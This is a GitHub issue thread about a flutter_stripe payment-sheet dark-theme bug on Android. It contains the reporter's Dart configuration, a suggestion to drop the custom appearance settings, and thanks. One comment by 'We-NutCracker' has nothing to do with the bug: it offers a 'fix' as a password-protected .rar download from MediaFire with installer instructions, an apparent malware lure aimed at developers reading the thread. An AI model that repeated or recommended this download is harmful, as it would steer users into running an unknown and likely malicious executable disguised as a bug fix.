### ISSUE TITLE
Dark Theme Issues: Light Modal Background and Dark Close Button (Android)

### ISSUE THREAD

**Issue by kherel** [flutter-stripe/flutter_stripe#1902]
**Describe the bug**

I am using the dark theme in my app, but I am encountering the following issues:

The modalBackgroundColor appears light instead of dark.
The close button is dark, which makes it hard to see on the dark background.

**To Reproduce**

use Android Emulator

    await Stripe.instance.initPaymentSheet(
      paymentSheetParameters: SetupPaymentSheetParameters(
        paymentIntentClientSecret: checkoutId,
        merchantDisplayName: 'Ticketsouq',
        primaryButtonLabel: 'Pay now',
        style: ThemeMode.dark,
        appearance: PaymentSheetAppearance(
          colors: PaymentSheetAppearanceColors(
            background: BrandColors.background,
            primary: BrandColors.purple,
            primaryText: Colors.white,
            secondaryText: Colors.white,
            componentBackground: BrandColors.white,
            componentBorder: BrandColors.white,
          ),
          shapes: PaymentSheetShape(
            borderWidth: 1,
            shadow: PaymentSheetShadowParams(color: BrandColors.background),
          ),
          primaryButton: PaymentSheetPrimaryButtonAppearance(
            shapes: PaymentSheetPrimaryButtonShape(blurRadius: 8),
            colors: PaymentSheetPrimaryButtonTheme(
              dark: PaymentSheetPrimaryButtonThemeColors(
                background: BrandColors.background,
                text: Colors.white,
                border: BrandColors.purple,
              ),
            ),
            
          ),
           
        ),
      ),
    );
     await Stripe.instance.presentPaymentSheet();

<img width="366" alt="Screenshot 2024-08-26 at 18 58 12" src="https://github.com/user-attachments/assets/f7b3d26d-495b-4acd-bcf4-cbe0ffae2f6d">

**Comment by We-NutCracker** [comment]
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by remonh87** [comment]
if you remove the paymentsheet appearance the color will be dark or light depending on your preferences. I would playaround a bit with your config there and see which settings are causing this behavior. The default sheet looks good on android dark

**Comment by kherel** [comment]
thanks
